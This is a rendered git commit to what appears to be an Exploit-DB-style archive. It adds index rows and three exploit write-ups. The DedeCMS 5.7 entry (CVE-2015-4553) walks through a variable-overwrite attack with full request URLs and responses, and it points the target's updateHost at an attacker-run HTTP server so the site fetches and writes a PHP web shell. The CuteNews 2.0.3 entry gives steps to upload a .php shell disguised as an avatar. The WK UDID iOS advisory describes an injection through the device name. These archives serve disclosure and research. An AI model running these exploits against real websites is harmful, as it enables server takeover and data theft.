DB: 2015-07-06
3 new exploits
This commit is contained in:
parent
cd8d6cadcf
commit
8ad2e6be05
4 changed files with 413 additions and 0 deletions
|
@ -33774,6 +33774,7 @@ id,file,description,date,author,platform,type,port
|
||||||
37418,platforms/php/webapps/37418.php,"WordPress LB Mixed Slideshow Plugin 'upload.php' Arbitrary File Upload Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
|
37418,platforms/php/webapps/37418.php,"WordPress LB Mixed Slideshow Plugin 'upload.php' Arbitrary File Upload Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
|
||||||
37419,platforms/php/webapps/37419.txt,"WordPress Wp-ImageZoom 'file' Parameter Remote File Disclosure Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
|
37419,platforms/php/webapps/37419.txt,"WordPress Wp-ImageZoom 'file' Parameter Remote File Disclosure Vulnerability",2012-06-18,"Sammy FORGIT",php,webapps,0
|
||||||
37420,platforms/php/webapps/37420.txt,"VANA CMS 'index.php' Script SQL Injection Vulnerability",2012-06-18,"Black Hat Group",php,webapps,0
|
37420,platforms/php/webapps/37420.txt,"VANA CMS 'index.php' Script SQL Injection Vulnerability",2012-06-18,"Black Hat Group",php,webapps,0
|
||||||
|
37423,platforms/php/webapps/37423.txt,"DedeCMS < 5.7-sp1 - Remote File Inclusion",2015-06-29,zise,php,webapps,0
|
||||||
37424,platforms/hardware/webapps/37424.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Disclosure",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0
|
37424,platforms/hardware/webapps/37424.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Disclosure",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0
|
||||||
37425,platforms/hardware/webapps/37425.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Change Vulnerability",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0
|
37425,platforms/hardware/webapps/37425.py,"Huawei Home Gateway UPnP/1.0 IGD/1.00 - Password Change Vulnerability",2015-06-29,"Fady Mohammed Osman",hardware,webapps,0
|
||||||
37426,platforms/cgi/remote/37426.py,"Endian Firewall < 3.0.0 - OS Command Injection (Python PoC)",2015-06-29,"Ben Lincoln",cgi,remote,0
|
37426,platforms/cgi/remote/37426.py,"Endian Firewall < 3.0.0 - OS Command Injection (Python PoC)",2015-06-29,"Ben Lincoln",cgi,remote,0
|
||||||
|
@ -33820,6 +33821,7 @@ id,file,description,date,author,platform,type,port
|
||||||
37471,platforms/windows/dos/37471.pl,"Zoom Player '.avi' File Divide-By-Zero Denial of Service Vulnerability",2012-07-02,Dark-Puzzle,windows,dos,0
|
37471,platforms/windows/dos/37471.pl,"Zoom Player '.avi' File Divide-By-Zero Denial of Service Vulnerability",2012-07-02,Dark-Puzzle,windows,dos,0
|
||||||
37472,platforms/php/webapps/37472.php,"GetSimple CMS Items Manager Plugin 'php.php' Arbitrary File Upload Vulnerability",2012-07-02,"Sammy FORGIT",php,webapps,0
|
37472,platforms/php/webapps/37472.php,"GetSimple CMS Items Manager Plugin 'php.php' Arbitrary File Upload Vulnerability",2012-07-02,"Sammy FORGIT",php,webapps,0
|
||||||
37473,platforms/php/webapps/37473.txt,"Joomla 2.5.x Language Switcher ModuleMultiple Cross Site Scripting Vulnerabilities",2012-07-02,"Stefan Schurtz",php,webapps,0
|
37473,platforms/php/webapps/37473.txt,"Joomla 2.5.x Language Switcher ModuleMultiple Cross Site Scripting Vulnerabilities",2012-07-02,"Stefan Schurtz",php,webapps,0
|
||||||
|
37474,platforms/php/webapps/37474.txt,"CuteNews 2.0.3 - Arbitrary File Upload Vulnerability",2015-07-03,T0x!c,php,webapps,80
|
||||||
37476,platforms/php/webapps/37476.txt,"php MBB Cross Site Scripting and SQL Injection Vulnerabilities",2012-07-03,TheCyberNuxbie,php,webapps,0
|
37476,platforms/php/webapps/37476.txt,"php MBB Cross Site Scripting and SQL Injection Vulnerabilities",2012-07-03,TheCyberNuxbie,php,webapps,0
|
||||||
37477,platforms/linux/dos/37477.txt,"gnome-terminal (vte) VteTerminal Escape Sequence Parsing Remote DoS",2012-07-03,"Kevin Fenzi",linux,dos,0
|
37477,platforms/linux/dos/37477.txt,"gnome-terminal (vte) VteTerminal Escape Sequence Parsing Remote DoS",2012-07-03,"Kevin Fenzi",linux,dos,0
|
||||||
37478,platforms/multiple/dos/37478.txt,"plow '.plowrc' File Buffer Overflow Vulnerability",2012-07-03,"Jean Pascal Pereira",multiple,dos,0
|
37478,platforms/multiple/dos/37478.txt,"plow '.plowrc' File Buffer Overflow Vulnerability",2012-07-03,"Jean Pascal Pereira",multiple,dos,0
|
||||||
|
@ -33834,3 +33836,4 @@ id,file,description,date,author,platform,type,port
|
||||||
37487,platforms/multiple/dos/37487.txt,"Apache Sling Denial Of Service Vulnerability",2012-07-06,IOactive,multiple,dos,0
|
37487,platforms/multiple/dos/37487.txt,"Apache Sling Denial Of Service Vulnerability",2012-07-06,IOactive,multiple,dos,0
|
||||||
37488,platforms/asp/webapps/37488.txt,"WebsitePanel 'ReturnUrl' Parameter URI Redirection Vulnerability",2012-07-09,"Anastasios Monachos",asp,webapps,0
|
37488,platforms/asp/webapps/37488.txt,"WebsitePanel 'ReturnUrl' Parameter URI Redirection Vulnerability",2012-07-09,"Anastasios Monachos",asp,webapps,0
|
||||||
37489,platforms/php/webapps/37489.txt,"MGB Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2012-07-09,"Stefan Schurtz",php,webapps,0
|
37489,platforms/php/webapps/37489.txt,"MGB Multiple Cross Site Scripting and SQL Injection Vulnerabilities",2012-07-09,"Stefan Schurtz",php,webapps,0
|
||||||
|
37492,platforms/ios/webapps/37492.txt,"WK UDID v1.0.1 iOS - Command Inject Vulnerability",2015-07-05,Vulnerability-Lab,ios,webapps,0
|
||||||
|
|
Can't render this file because it is too large.
|
163
platforms/ios/webapps/37492.txt
Executable file
163
platforms/ios/webapps/37492.txt
Executable file
|
@ -0,0 +1,163 @@
|
||||||
|
Document Title:
|
||||||
|
===============
|
||||||
|
WK UDID v1.0.1 iOS - Command Inject Vulnerability
|
||||||
|
|
||||||
|
|
||||||
|
References (Source):
|
||||||
|
====================
|
||||||
|
http://www.vulnerability-lab.com/get_content.php?id=1539
|
||||||
|
|
||||||
|
|
||||||
|
Release Date:
|
||||||
|
=============
|
||||||
|
2015-07-01
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Laboratory ID (VL-ID):
|
||||||
|
====================================
|
||||||
|
1539
|
||||||
|
|
||||||
|
|
||||||
|
Common Vulnerability Scoring System:
|
||||||
|
====================================
|
||||||
|
5.6
|
||||||
|
|
||||||
|
|
||||||
|
Product & Service Introduction:
|
||||||
|
===============================
|
||||||
|
This app offers the opportunity to read device-specific information from your iPhone, iPad or iPod touch. The desired information can be
|
||||||
|
selected and sent via email to a recipient of your choice or it can be copied to the clipboard for later use. You can get information about
|
||||||
|
the unique identifier (UDID), the model, the name and the operating system of your device.
|
||||||
|
|
||||||
|
(Copy of the Homepage https://itunes.apple.com/us/app/wk-udid/id392624227 )
|
||||||
|
|
||||||
|
|
||||||
|
Abstract Advisory Information:
|
||||||
|
==============================
|
||||||
|
The Vulnerability Laboratory Research team discovered a local command inject web vulnerability in the official WK UDID v1.0.1 iOS mobile web-application.
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Disclosure Timeline:
|
||||||
|
==================================
|
||||||
|
2015-07-01: Public Disclosure (Vulnerability Laboratory)
|
||||||
|
|
||||||
|
|
||||||
|
Discovery Status:
|
||||||
|
=================
|
||||||
|
Published
|
||||||
|
|
||||||
|
|
||||||
|
Affected Product(s):
|
||||||
|
====================
|
||||||
|
WK EDV GmbH
|
||||||
|
Product: WK UDID - iOS Mobile Web Application 1.0.1
|
||||||
|
|
||||||
|
|
||||||
|
Exploitation Technique:
|
||||||
|
=======================
|
||||||
|
Local
|
||||||
|
|
||||||
|
|
||||||
|
Severity Level:
|
||||||
|
===============
|
||||||
|
Medium
|
||||||
|
|
||||||
|
|
||||||
|
Technical Details & Description:
|
||||||
|
================================
|
||||||
|
A local command inject web vulnerability has been discovered in the official WK UDID v1.0.1 iOS mobile web-application.
|
||||||
|
The vulnerability allows to inject malicious script codes to the application-side of the vulnerable mobile app.
|
||||||
|
|
||||||
|
The vulnerability is located in the device name value of the send by mail function. Local attackers are able to manipulate the name value
|
||||||
|
of the device to compromise the mail function of the wkudid mobile app. The html encoding is broken in the send by mail export function.
|
||||||
|
Local attackers are able to manipulate the device name id to compromise the application internal validation in send emails. The attack vector
|
||||||
|
of the vulnerability is server-side and the injection point is the device name information settings.
|
||||||
|
|
||||||
|
The security risk of the local commandpath inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.6.
|
||||||
|
Exploitation of the commandpath inject vulnerability requires a low privilege androidios device account with restricted access and no user interaction.
|
||||||
|
Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to
|
||||||
|
compromise the mobile iOS application and connected device components.
|
||||||
|
|
||||||
|
Vulnerable Module(s)
|
||||||
|
[+] Device - Settings - Information
|
||||||
|
|
||||||
|
Vulnerable Parameter(s)
|
||||||
|
[+] device name
|
||||||
|
|
||||||
|
Affected Module(s)
|
||||||
|
[+] WKUDID - Mail
|
||||||
|
|
||||||
|
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
The local command inject web vulnerability can be exploited by local attackers with low privilege device user account and without user interaction.
|
||||||
|
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
|
||||||
|
|
||||||
|
Manual steps to reproduce the vulnerability ...
|
||||||
|
1. Start the iOS device
|
||||||
|
2. Open the settings module
|
||||||
|
3. Change the name to the local command injection payload
|
||||||
|
4. Save the settings and start the application wkudid
|
||||||
|
5. Send the details by mail
|
||||||
|
6. Review the arrival inbox
|
||||||
|
7. The execution point is the xml and header location with the device name value
|
||||||
|
8. Successful reproduce of the local command inject security vulnerability!
|
||||||
|
|
||||||
|
|
||||||
|
PoC Device ID - Email
|
||||||
|
|
||||||
|
<div>Identifier (UDID): FFFFFFFFC0463E7B3E5D46A88EDF4194C74B27D1
|
||||||
|
<br>Model: iPad<br>Name: bkm337>"<./[LOCAL COMMAND INJECT VULNERABILITY VIA DEVICE NAME VALUE!]">%20<gt;<BR>
|
||||||
|
System Name: iPhone OS<BR>System Version: 8.3<BR>Total Memory (RAM): 987.98 MB<BR>
|
||||||
|
Free Memory: 19.06 MB<BR>Total Storage: 27.19 GB<BR>Free Storage: 0.70 GB<BR>
|
||||||
|
CPU Frequency: an error occured<BR>Network: WiFi<BR>Wi-Fi: 02:00:00:00:00:00<BR>
|
||||||
|
IP Address: 192.168.2.104<BR>Carrier: not available<BR></iframe></div>
|
||||||
|
|
||||||
|
|
||||||
|
Solution - Fix & Patch:
|
||||||
|
=======================
|
||||||
|
The vulnerability can be patched by a secure parse and encode of the vulnerable Device name value. Restrict the input and encode the output in the
|
||||||
|
vulnerable generated html file. Disallow script code values in the html generated file type to prevent further command injection attacks.
|
||||||
|
|
||||||
|
|
||||||
|
Security Risk:
|
||||||
|
==============
|
||||||
|
The security rsik of the local command inject web vulnerability in the device name value is estimated as medium. (CVSS 5.6)
|
||||||
|
|
||||||
|
|
||||||
|
Credits & Authors:
|
||||||
|
==================
|
||||||
|
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
||||||
|
|
||||||
|
|
||||||
|
Disclaimer & Information:
|
||||||
|
=========================
|
||||||
|
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
||||||
|
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
||||||
|
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
||||||
|
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
|
||||||
|
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
|
||||||
|
policies, deface websites, hack into databases or trade with fraud/stolen material.
|
||||||
|
|
||||||
|
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||||
|
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||||
|
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||||
|
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||||
|
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||||
|
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
|
||||||
|
|
||||||
|
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
|
||||||
|
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||||
|
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
|
||||||
|
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
|
||||||
|
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||||||
|
|
||||||
|
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||||
|
|
||||||
|
--
|
||||||
|
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||||
|
SERVICE: www.vulnerability-lab.com
|
||||||
|
CONTACT: research@vulnerability-lab.com
|
||||||
|
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
|
||||||
|
|
||||||
|
|
199
platforms/php/webapps/37423.txt
Executable file
199
platforms/php/webapps/37423.txt
Executable file
|
@ -0,0 +1,199 @@
|
||||||
|
==========================
|
||||||
|
# Exploit Title: Dedecms variable coverage leads to getshell
|
||||||
|
# Date: 26-06-2015
|
||||||
|
# Vendor Homepage: http://www.dedecms.com/]
|
||||||
|
# Version: dedecms 5.7-sp1 and all old version
|
||||||
|
# CVE : CVE-2015-4553
|
||||||
|
===========================
|
||||||
|
|
||||||
|
|
||||||
|
[CVE-2015-4553]Dedecms variable coverage leads to getshell
|
||||||
|
#############################################################################
|
||||||
|
#
|
||||||
|
# DBAPPSECURITY LIMITED http://www.dbappsecurity.com.cn/
|
||||||
|
#
|
||||||
|
#############################################################################
|
||||||
|
#
|
||||||
|
# CVE ID: CVE-2015-4553
|
||||||
|
# Subject: Dedecms variable coverage leads to getshell
|
||||||
|
# Author: zise
|
||||||
|
# Date: 06.17.2015
|
||||||
|
#############################################################################
|
||||||
|
Introduction:
|
||||||
|
========
|
||||||
|
dedecms Open source cms
|
||||||
|
Extensive application
|
||||||
|
|
||||||
|
Influence version
|
||||||
|
Newest dedecms 5.7-sp1 and all old version
|
||||||
|
|
||||||
|
|
||||||
|
Remote getshell
|
||||||
|
Details:
|
||||||
|
=======
|
||||||
|
After the default installation of dedecms
|
||||||
|
Installation directory
|
||||||
|
/install/index.php
|
||||||
|
or
|
||||||
|
/install/index.php.bak
|
||||||
|
|
||||||
|
/install/index.php //run iis apache exploit
|
||||||
|
/install/index.php.bak //run apache exploit
|
||||||
|
|
||||||
|
|
||||||
|
Code analysis
|
||||||
|
|
||||||
|
/install/index.php.bak?install_demo_name=aaaa&insLockfile=bbbb
|
||||||
|
|
||||||
|
#############################################################################
|
||||||
|
17 $install_demo_name = 'dedev57demo.txt';
|
||||||
|
18 $insLockfile = dirname(__FILE__).'/install_lock.txt';
|
||||||
|
|
||||||
|
here $install_demo_name and $insLockfile definition
|
||||||
|
// echo $install_demo_name; printf dedev57demo.txt
|
||||||
|
|
||||||
|
29 foreach(Array('_GET','_POST','_COOKIE') as $_request)
|
||||||
|
30 {
|
||||||
|
31 foreach($$_request as $_k => $_v) ${$_k} = RunMagicQuotes($_v);
|
||||||
|
32 }
|
||||||
|
|
||||||
|
|
||||||
|
// echo $install_demo_name; printf aaaa
|
||||||
|
|
||||||
|
$install_demo_name by variable coverage
|
||||||
|
|
||||||
|
The same
|
||||||
|
17 $install_demo_name = 'dedev57demo.txt';
|
||||||
|
18 $insLockfile = dirname(__FILE__).'/install_lock.txt';
|
||||||
|
|
||||||
|
variable coverage
|
||||||
|
#############################################################################
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
GETSHELL Step 1 Clear file contents config_update.php
|
||||||
|
#############################################################################
|
||||||
|
config_update.php
|
||||||
|
13 $updateHost = 'http://updatenew.dedecms.com/base-v57/';
|
||||||
|
14 $linkHost = 'http://flink.dedecms.com/server_url.php';
|
||||||
|
|
||||||
|
In order to obtain the webshell need to control $updateHost
|
||||||
|
So the use of variable coverags cleared config_update.php
|
||||||
|
|
||||||
|
|
||||||
|
http://192.168.204.135/install/index.php.bak
|
||||||
|
?step=11
|
||||||
|
&insLockfile=a
|
||||||
|
&s_lang=a
|
||||||
|
&install_demo_name=../data/admin/config_update.php
|
||||||
|
|
||||||
|
index.php.bak
|
||||||
|
373 else if($step==11)
|
||||||
|
374 {
|
||||||
|
375 require_once('../data/admin/config_update.php');
|
||||||
|
376 $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";
|
||||||
|
377
|
||||||
|
378 $sql_content = file_get_contents($rmurl);
|
||||||
|
379 $fp = fopen($install_demo_name,'w');
|
||||||
|
380 if(fwrite($fp,$sql_content))
|
||||||
|
381 echo ' <font color="green">[√]</font> 存在(您可以选择安装进行体验)';
|
||||||
|
382 else
|
||||||
|
383 echo ' <font color="red">[×]</font> 远程获取失败';
|
||||||
|
384 unset($sql_content);
|
||||||
|
385 fclose($fp);
|
||||||
|
386 exit();
|
||||||
|
387 }
|
||||||
|
|
||||||
|
###
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Date: Wed, 17 Jun 2015 06:55:23 GMT
|
||||||
|
Server: Apache/2.4.12
|
||||||
|
X-Powered-By: PHP/5.6.6
|
||||||
|
Vary: User-Agent
|
||||||
|
Content-Length: 55
|
||||||
|
Keep-Alive: timeout=5, max=100
|
||||||
|
Connection: Keep-Alive
|
||||||
|
Content-Type: text/html; charset=utf-8
|
||||||
|
|
||||||
|
<font color="red">[×]</font> 远程获取失败
|
||||||
|
###
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
###After execution file 0 byte ~ho~year~####
|
||||||
|
2015/06/17 14:55 0 config_update.php
|
||||||
|
1 file 0 byte
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
GETSHELL Step 2
|
||||||
|
#############################################################################
|
||||||
|
Create local HTTP services
|
||||||
|
|
||||||
|
zise:tmp zise$ ifconfig en0
|
||||||
|
en0: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
|
||||||
|
inet 119.253.3.18 netmask 0xffffff00 broadcast
|
||||||
|
|
||||||
|
zise:tmp zise$ mkdir "dedecms"
|
||||||
|
zise:tmp zise$ cd dedecms/
|
||||||
|
zise:dedecms zise$ echo "<?php phpinfo();?>" > demodata.a.txt
|
||||||
|
zise:dedecms zise$ cd ../
|
||||||
|
zise:tmp zise$ python -m SimpleHTTPServer
|
||||||
|
Serving HTTP on 0.0.0.0 port 8000 ...
|
||||||
|
192.168.204.135 - - [17/Jun/2015 15:11:18] "GET /dedecms/demodata.a.txt HTTP/1.0" 200 -
|
||||||
|
|
||||||
|
|
||||||
|
####
|
||||||
|
http://192.168.204.135/install/index.php.bak
|
||||||
|
?step=11
|
||||||
|
&insLockfile=a
|
||||||
|
&s_lang=a
|
||||||
|
&install_demo_name=hello.php
|
||||||
|
&updateHost=http://119.253.3.18:8000/
|
||||||
|
|
||||||
|
####
|
||||||
|
|
||||||
|
HTTP/1.1 200 OK
|
||||||
|
Date: Wed, 17 Jun 2015 07:11:18 GMT
|
||||||
|
Server: Apache/2.4.12
|
||||||
|
X-Powered-By: PHP/5.6.6
|
||||||
|
Vary: Accept-Encoding,User-Agent
|
||||||
|
Content-Length: 81
|
||||||
|
Keep-Alive: timeout=5, max=100
|
||||||
|
Connection: Keep-Alive
|
||||||
|
Content-Type: text/html; charset=utf-8
|
||||||
|
|
||||||
|
<font color="green">[√]</font> 存在(您可以选择安装进行体验)
|
||||||
|
|
||||||
|
|
||||||
|
index.php.bak
|
||||||
|
373 else if($step==11)
|
||||||
|
374 {
|
||||||
|
375 require_once('../data/admin/config_update.php');
|
||||||
|
376 $rmurl = $updateHost."dedecms/demodata.{$s_lang}.txt";
|
||||||
|
377
|
||||||
|
378 $sql_content = file_get_contents($rmurl);
|
||||||
|
379 $fp = fopen($install_demo_name,'w');
|
||||||
|
380 if(fwrite($fp,$sql_content)) //fwrite websehll
|
||||||
|
381 echo ' <font color="green">[√]</font> 存在(您可以选择安装进行体验)';
|
||||||
|
382 else
|
||||||
|
383 echo ' <font color="red">[×]</font> 远程获取失败';
|
||||||
|
384 unset($sql_content);
|
||||||
|
385 fclose($fp);
|
||||||
|
386 exit();
|
||||||
|
387 }
|
||||||
|
|
||||||
|
Attack complete
|
||||||
|
you webshell
|
||||||
|
|
||||||
|
http://192.168.204.135/install/hello.php
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
> zise ^_^
|
||||||
|
> Security researcher
|
||||||
|
|
||||||
|
This is the vulnerability of some web pages
|
||||||
|
http://seclists.org/fulldisclosure/2015/Jun/47
|
48
platforms/php/webapps/37474.txt
Executable file
48
platforms/php/webapps/37474.txt
Executable file
|
@ -0,0 +1,48 @@
|
||||||
|
CuteNews 2.0.3 Remote File Upload Vulnerability
|
||||||
|
=================================================
|
||||||
|
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
|
||||||
|
0 _ __ __ __ 1
|
||||||
|
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
|
||||||
|
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
|
||||||
|
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
|
||||||
|
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
|
||||||
|
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
|
||||||
|
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
|
||||||
|
1 \ \____/ >> Exploit database separated by exploit 0
|
||||||
|
0 \/___/ type (local, remote, DoS, etc.) 1
|
||||||
|
1 1
|
||||||
|
0 [+] Site : Inj3ct0r.com 0
|
||||||
|
1 [+] Support e-mail : submit[at]inj3ct0r.com 1
|
||||||
|
0 0
|
||||||
|
1 ########################################## 1
|
||||||
|
0 I'm T0x!c member from Inj3ct0r Team 1
|
||||||
|
1 ########################################## 0
|
||||||
|
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
# Exploit Title: CuteNews 2.0.3 Remote File Upload Vulnerability
|
||||||
|
# Date: [02/07/2015]
|
||||||
|
# Exploit Author: [T0x!c]
|
||||||
|
# Facebook: https://www.facebook.com/Dz.pr0s
|
||||||
|
# Vendor Homepage: [http://cutephp.com/]
|
||||||
|
# Software Link: [http://cutephp.com/cutenews/cutenews.2.0.3.zip]
|
||||||
|
# Version: [2.0.3]
|
||||||
|
# Tested on: [Windows 7]
|
||||||
|
# greetz to :Tr00n , Kha&mix , Cc0de , Ghosty , Ked ans , Caddy-dz .....
|
||||||
|
==========================================================
|
||||||
|
# Exploit :
|
||||||
|
|
||||||
|
Vuln : http://127.0.0.1/cutenews/index.php?mod=main&opt=personal
|
||||||
|
|
||||||
|
1 - Sign up for New User
|
||||||
|
2 - Log In
|
||||||
|
3 - Go to Personal options http://www.target.com/cutenews/index.php?mod=main&opt=personal
|
||||||
|
4 - Select Upload Avatar Example: Evil.jpg
|
||||||
|
5 - use tamper data & Rename File Evil.jpg to Evil.php
|
||||||
|
|
||||||
|
-----------------------------2847913122899\r\nContent-Disposition: form-data; name="avatar_file"; filename="Evil.php"\r\
|
||||||
|
|
||||||
|
6 - Your Shell : http://127.0.0.1/cutenews/uploads/avatar_Username_FileName.php
|
||||||
|
|
||||||
|
Example: http://127.0.0.1/cutenews/uploads/avatar_toxic_Evil.php
|
Loading…
Add table
Reference in a new issue